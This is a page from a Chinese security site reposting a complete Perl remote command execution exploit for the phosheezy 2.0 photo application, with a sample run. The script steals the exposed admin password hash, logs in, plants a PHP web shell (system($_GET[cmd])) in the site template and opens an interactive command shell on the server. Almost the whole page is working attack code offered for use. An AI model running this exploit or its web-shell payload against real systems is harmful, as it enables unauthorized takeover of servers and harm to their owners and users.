首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phosheezy 2.0 Remote Command Execution Exploit
来源:osirys.org 作者:Osirys 发布时间:2009-01-15  
#!/usr/bin/perl

# phosheezy 2.0
# http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz
# Remote Command Execution Exploit
# by Osirys
# osirys[at]live[dot]it
# osirys.org
# Greets: HaVoC, x0r, jay, BlackLight
# lol at athos

# --------------------------------------------------------------
# Exploit in action :D
# --------------------------------------------------------------
# osirys[~]>$ perl exp.txt http://localhost/phosheezy/
#
#   ----------------------------
#      Phosheezy RCE Exploit
#         Coded by Osirys
#   ----------------------------
#
# [+] Admin password found:
#     Sha1 pwd: 8942c747dc48c47a6f7f026df85a448046348a2c
# [+] Grabbing server headers to get a valid SESSION ID ..
# [+] SESSION ID grabbed: 3srqiuh8jrttt73tbd7j5uvhi2
# [+] Succesfully logged in as Administrator
# [+] Template edited, RCE Vulnerability Created !
# shell$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell$> exit
# [-] Quitting ..
# osirys[~]>$
# --------------------------------------------------------------

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;

my $host       =  $ARGV[0];
my $pwd_path   =  "/config/password";
my $adm_path   =  "/admin.php";
my $templ_path =  "/admin.php?action=3";

help("-1") unless ($host);
cheek($host) == 1 || help("-2");
&banner;

$datas = get_data($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

my $url = $host.$pwd_path;
my $re = get_req($url);

if ($re =~ /([0-9a-f]{40})/) {
    $password = $1;
    print "[+] Admin password found:\n";
    print "    Sha1 pwd: $password  \n";
    adm_log($password);
}
else {
    print "[-] Unable to get sha1 Admin password\n\n";
    exit(0);
}

sub adm_log() {
    my $password =  $_[0];
    my $link     =  $path.".".$adm_path;
    my $post     =  "password=$password&Login=Login";
    my $length   =  length($post);
    my @data;
    my $socket   =  new IO::Socket::INET(
                                          PeerAddr => $h0st,
                                          PeerPort => '80',
                                          Proto    => 'tcp',
                                        ) or die $!;

    my $data = "POST ".$link." HTTP/1.1\r\n".
               "Host: ".$h0st."\r\n".
               "Content-Type: application/x-www-form-urlencoded\r\n".
               "Content-Length: ".$length."\r\n\r\n".
               $post."\r\n";

    $socket->send($data);
    print "[+] Grabbing server headers to get a valid SESSION ID ..\n";

    while (my $e = <$socket>) {
        push(@data,$e);
    }
    foreach my $e(@data) {
        if ($e =~ /Welcome to Ryneezy PhoSheezy web administration/) {
            $log_ = 1;
            print "[+] Succesfully logged in as Administrator\n";
        }
        elsif ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) {
            $phpsessid = $1;
            print "[+] SESSION ID grabbed: $phpsessid\n";
        }
    }

    (($log_)&&($phpsessid)) || die "[-] Exploit failed -> Login Failed or SESSION ID not grabbed!\n";
    RCE_create($phpsessid);
}

sub RCE_create() {
    my $phpsessid = $_[0];
    my $link     =  $path.".".$templ_path;
    my $code = "header=<html><head><title>Ryneezy PhoSheezy</tit".
               "le></head><body bgcolor=\"#ffffff\" text=\"#0000".
               "00\">&footer=</body></html><!-- cmd --><?php sys".
               "tem(\$_GET[cmd]);?><!--cmd-->&Submit=Edit Layout";
    my $length =  length($code);

    my $socket = new IO::Socket::INET(
                                       PeerAddr => $h0st,
                                       PeerPort => '80',
                                       Proto    => 'tcp',
                                     ) or die $!;

    my $data = "POST ".$link." HTTP/1.1\r\n".
               "Host: ".$h0st."\r\n".
               "Cookie: PHPSESSID=".$phpsessid."; hotlog=1\r\n".
               "Content-Type: application/x-www-form-urlencoded\r\n".
               "Content-Length: ".$length."\r\n\r\n".
               "$code\r\n";

    $socket->send($data);

    while (my $e = <$socket>) {
        if ($e =~ /Edit layout again/) {
            $rce_c = 1;
            print "[+] Template edited, RCE Vulnerability Created !\n";
        }
    }

    $rce_c == 1 || die "[-] Can't edit Template. Exploit failed\n\n";
    &exec_cmd;
}

sub exec_cmd {
    print "shell\$> ";
    $cmd = <STDIN>;
    $cmd !~ /exit/ || die "[-] Quitting ..\n";
    $exec_url = ($host."/index.php?cmd=".$cmd);
    $re = get_req($exec_url);
    if ($re =~ /<!-- cmd -->(.*)/) {
        my $cmd = $1;
        $cmd =~ s/<!--cmd-->/[-] Undefined output or bad cmd !/;
        print "$cmd\n";
        &exec_cmd;
    }
    else {
        print "[-] Undefined output or bad cmd !\n";
        &exec_cmd;
    }
}

sub get_req() {
    $link   = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua  = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
}

sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
}

sub get_data() {
    my $host = $_[0];
    $host =~ /http:\/\/(.*)/;
    $s_host = $1;
    $s_host =~ /([a-z.]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);
    $h0st !~ /www/ || $h0st =~ s/www\.//;
    $path =~ s/(.*)/\/$1/;
    $full_det = $h0st." ".$path;
    return $full_det;
}

sub banner {
    print "\n".
          "  ---------------------------- \n".
          "     Phosheezy RCE Exploit     \n".
          "        Coded by Osirys        \n".
          "  ---------------------------- \n\n";
}

sub help() {
    my $error = $_[0];
    if ($error == -1) {
        &banner;
        print "\n[-] Cheek that you provide a hostname address!\n";
    }
    elsif ($error == -2) {
        &banner;
        print "\n[-] Bad hostname address !\n";
    }
    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
    exit(0);
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AAA EasyGrid ActiveX 3.51 Rem
·Oracle Secure Backup 10g exec_
·Exploits 3CTftpSvc Server 2.0.
·Oracle TimesTen Remote Format
·AT-TFTP Buffer Overflow (Long
·NetSurf version 1.2 remote mem
·3CTftpSvc transport mode name
·NetSurf version 1.2 width remo
·3ctftpsvc Buffer Overflow (Lon
·NetSurf version 1.2 hspace rem
·KDE Konqueror 4.1.3 'iframe sr
·The Cisco IOS HTTP server is v
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved